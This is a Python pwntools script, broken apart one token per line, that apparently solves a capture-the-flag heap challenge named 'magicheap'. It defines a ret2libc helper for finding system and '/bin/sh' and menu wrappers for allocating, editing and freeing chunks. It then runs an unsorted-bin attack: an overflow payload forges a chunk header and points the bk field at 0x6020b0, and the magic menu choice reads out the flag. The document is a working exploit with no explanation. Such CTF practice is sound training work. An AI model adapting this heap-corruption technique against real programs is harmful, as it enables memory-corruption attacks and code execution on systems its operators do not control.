from
pwn
import
*
from
LibcSearcher
import
LibcSearcher
from
sys
import
argv
def
ret2libc(leak, func, path
=
''):
if
path
=
=
'':
libc
=
LibcSearcher(func, leak)
base
=
leak
-
libc.dump(func)
system
=
base
+
libc.dump(
'system'
)
binsh
=
base
+
libc.dump(
'str_bin_sh'
)
else
:
libc
=
ELF(path)
base
=
leak
-
libc.sym[func]
system
=
base
+
libc.sym[
'system'
]
binsh
=
base
+
libc.search(
'/bin/sh'
).
next
()
return
(base, system, binsh)
s
=
lambda
data :p.send(
str
(data))
sa
=
lambda
delim,data :p.sendafter(delim,
str
(data))
sl
=
lambda
data :p.sendline(
str
(data))
sla
=
lambda
delim,data :p.sendlineafter(delim,
str
(data))
r
=
lambda
num
=
4096
:p.recv(num)
ru
=
lambda
delims, drop
=
True
:p.recvuntil(delims, drop)
uu64
=
lambda
data :u64(data.ljust(
8
,
'\0'
))
leak
=
lambda
name,addr :log.success(
'{} = {:#x}'
.
format
(name, addr))
context.log_level
=
'DEBUG'
binary
=
'./magicheap'
context.binary
=
binary
elf
=
ELF(binary,checksec
=
False
)
p
=
process(binary)
libc
=
ELF(
'/lib/x86_64-linux-gnu/libc.so.6'
,checksec
=
False
)
def
dbg():
gdb.attach(p)
pause()
def
create(size, content):
ru(
"choice :"
)
sl(
"1"
)
ru(
"Heap : "
)
sl(
str
(size))
ru(
"heap:"
)
sl(content)
def
edit(idx, size, content):
ru(
"choice :"
)
sl(
"2"
)
ru(
"Index :"
)
sl(
str
(idx))
ru(
"Heap : "
)
sl(
str
(size))
ru(
"heap : "
)
sl(content)
def
delete(idx):
ru(
"choice :"
)
sl(
"3"
)
ru(
"Index :"
)
sl(
str
(idx))
create(
300
,
'a'
*
300
)
create(
400
,
'a'
*
400
)
create(
500
,
'a'
*
500
)
delete(
1
)
fake_chunk_addr
=
0x6020b0
payload
=
'b'
*
0x130
+
p64(
0
)
+
p64(
0x1a1
)
+
p64(
0
)
+
p64(fake_chunk_addr)
edit(
0
,
700
,payload)
create(
400
,
'c'
*
400
)
ru(
"choice :"
)
sl(
str
(
4869
))
ru(
"Congrt !\n"
)
flag
=
ru(
"\n"
)
print
(flag)
p.interactive()